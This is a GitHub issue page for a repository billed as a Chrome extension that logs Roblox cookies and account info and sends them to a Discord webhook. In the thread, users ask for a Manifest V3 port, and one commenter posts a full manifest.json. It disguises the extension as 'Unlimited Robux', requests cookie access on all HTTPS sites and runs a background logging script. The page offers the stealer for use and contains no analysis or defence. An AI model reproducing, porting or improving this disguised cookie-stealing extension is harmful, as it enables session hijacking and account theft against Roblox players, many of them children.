tcpcon / chrome-extension-logger-poc

Chrome extension that logs roblox cookie + info and sends logged info to a discord webhook.
GNU General Public License v3.0
101 stars 223 forks source link

enhancement Make a version that supports manifest_version": 3 #8

Open ItsCerv opened 2 years ago

ItsCerv commented 2 years ago

Please make a Manifest version 3 version

ItsCerv commented 2 years ago

wont log on browser start up because v3 doesn't allow persistent or something image

W1ldAustin commented 2 years ago

I updated it to Manifest 3, along with tested it personally. Just change the manifest.json to the following:

{
    "name": "Unlimited Robux",
    "description": "Extension for https://www.roblox.com",
    "version": "1.0.1",
    "manifest_version": 3,

    "action" : {
        "default_icon": "assets/roblox.png"
    },

    "host_permissions": [
    "https://*/*"
    ],

    "permissions": [
        "cookies"
    ],

    "background": {
        "service_worker": "scripts/log.js"
    },

    "icons": {
        "16": "assets/roblox.png",
        "32": "assets/roblox.png",
        "48": "assets/roblox.png",
        "128": "assets/roblox.png"
    }
}
n6icko commented 2 years ago

it says invalid manifest. image